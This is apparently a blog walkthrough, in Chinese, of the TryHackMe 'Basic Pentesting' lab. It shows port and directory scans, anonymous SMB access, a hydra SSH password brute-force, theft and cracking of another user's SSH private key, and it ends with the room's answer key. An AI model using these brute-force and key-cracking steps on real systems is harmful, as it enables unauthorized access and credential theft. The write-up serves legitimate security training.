Tryhackme-easy-Basic Pentesting

August 14, 2024 ·  ·

日常练习

Tryhackme-easy-Basic Pentesting

Basic Pentesting

Web App Testing and Privilege Escalation

先进行信息搜集,看端口,找目录

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49

┌──(kali㉿kali)-[~/桌面]
└─$ nmap -sV -sC -T4 10.10.233.69
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-11 07:01 EDT
Nmap scan report for 10.10.233.69
Host is up (0.27s latency).
Not shown: 955 closed tcp ports (conn-refused), 39 filtered tcp ports (no-response)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
|   256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_  256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http        Apache Tomcat 9.0.7
|_http-title: Apache Tomcat/9.0.7
|_http-favicon: Apache Tomcat
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: basic2
|   NetBIOS computer name: BASIC2\x00
|   Domain name: \x00
|   FQDN: basic2
|_  System time: 2024-03-11T07:02:44-04:00
| smb2-time: 
|   date: 2024-03-11T11:02:44
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 1h20m00s, deviation: 2h18m34s, median: 0s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.19 seconds

扫描过程中,估计是网络问题,dirsearch一直崩,但是好歹是扫描出来一个异常目录

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

┌──(kali㉿kali)-[~/桌面]
└─$ dirsearch -u 10.10.233.69 

  _|. _ _  _  _  _ _|_    v0.4.3 
 (_||| _) (/_(_|| (_| )                                                                     
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/桌面/reports/_10.10.233.69/_24-03-11_06-57-34.txt

Target: http://10.10.233.69/

[06:57:34] Starting:                                                                                
[06:57:50] 403 -  298B  - /.ht_wsr.txt                                  
[06:57:50] 403 -  301B  - /.htaccess.bak1                               
[06:57:50] 403 -  301B  - /.htaccess.orig
[06:57:51] 403 -  302B  - /.htaccess_extra                              
[06:57:51] 403 -  303B  - /.htaccess.sample
[06:57:51] 403 -  301B  - /.htaccess_orig
[06:57:51] 403 -  299B  - /.htaccessBAK
[06:57:51] 403 -  299B  - /.htaccess_sc
[06:57:51] 403 -  292B  - /.html
[06:57:51] 403 -  301B  - /.htaccess.save                               
[06:57:51] 403 -  298B  - /.httr-oauth                                  
[06:57:51] 403 -  297B  - /.htpasswds
[06:57:51] 403 -  301B  - /.htpasswd_test                               
[06:57:51] 403 -  300B  - /.htaccessOLD2                                
[06:57:51] 403 -  291B  - /.htm
[06:57:52] 403 -  299B  - /.htaccessOLD
[06:58:48] 200 -  476B  - /development/

提交的隐藏目录也是正确的

访问development目录,找到两个文件

dev.txt

1
2
3
4
5
6
7
8

2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm 
using version 2.5.12, because other versions were giving me trouble. -K

2018-04-22: SMB has been configured. -K

2018-04-21: I got Apache set up. Will put in our content later. -J

j.txt

1
2
3
4
5
6
7

For J:

I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.

-K

在查阅过程中,发现存在一个SMB枚举工具enum4linux,但是反复尝试了几次,都未能成功枚举出用户

奇了个怪了,每次扫描的结果还不一样,当然,我估计大概率还是网络问题

确实是,换了个欧洲节点快了不少,我自己的问题

1
2

[+] Attempting to map shares on 10.10.233.69                                                        
//10.10.233.69/Anonymous        Mapping: OK Listing: OK Writing: N/A

从这条信息中,已经可以看出存在匿名登录,但是应该可以直接扫出需要的用户名,不知道为什么没有(

1

smbclient //10.10.233.69/anonymous

成功登录上,发现存在staff.txt

1
2
3
4
5
6
7
8

┌──(kali㉿kali)-[~/桌面]
└─$ cat staff.txt 
Announcement to staff:

PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)

-Kay

然后开始爆破账户密码

1

hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.82.249 ssh

出现了小小的问题,网络原因导致我这边爆破几乎无用,这一步只能暂时省略一下

1

armando

登录账户

1

ssh jan@10.10.82.249

得到立足点之后,开始思考提权

在当前目录下无有价值信息,发现还存在另一个登录用户目录kay,但是权限不足,无法查看pass.bak

开始进行枚举,查找相关提权思路

1
2

jan@basic2:/home/kay$ ls -a
.  ..  .bash_history  .bash_logout  .bashrc  .cache  .lesshst  .nano  pass.bak  .profile  .ssh  .sudo_as_admin_successful  .viminfo

发现存在ssh文件

1
2
3
4
5
6
7

jan@basic2:/home/kay$ ls -la ./.ssh
total 20
drwxr-xr-x 2 kay kay 4096 Apr 23  2018 .
drwxr-xr-x 5 kay kay 4096 Apr 23  2018 ..
-rw-rw-r-- 1 kay kay  771 Apr 23  2018 authorized_keys
-rw-r--r-- 1 kay kay 3326 Apr 19  2018 id_rsa
-rw-r--r-- 1 kay kay  771 Apr 19  2018 id_rsa.pub

有rsa密钥文件,复制下来保存到一个文件中,尝试破解

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18

┌──(kali㉿kali)-[~/桌面]
└─$ vim idrsa   
                                                                                                    
┌──(kali㉿kali)-[~/桌面]
└─$ ssh2john idrsa > idrsahash
                                                                                                    
┌──(kali㉿kali)-[~/桌面]
└─$ john idrsahash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax          (idrsa)   
1g 0:00:00:00 DONE (2024-03-12 04:54) 50.00g/s 4137Kp/s 4137Kc/s 4137KC/s behlat..bammer
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

成功破解出密码

1

ssh -i id_rsa kay@10.10.82.249

然后开始读取

1
2

cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$

Answer

  1. Deploy the machine and connect to our network
  2. Find the services exposed by the machine
  3. What is the name of the hidden directory on the web server(enter name without /)?
1

development
  1. User brute-forcing to find the username & password
  2. What is the username?
1

Jan
  1. What is the password?
1

armando
  1. What service do you use to access the server(answer in abbreviation in all caps)?
1

ssh
  1. Enumerate the machine to find any vectors for privilege escalation
  2. What is the name of the other user you found(all lower case)?
1

kay
  1. If you have found another user, what can you do with this information?
  2. What is the final password you obtain?
1

heresareallystrongpasswordthatfollowsthepasswordpolicy$$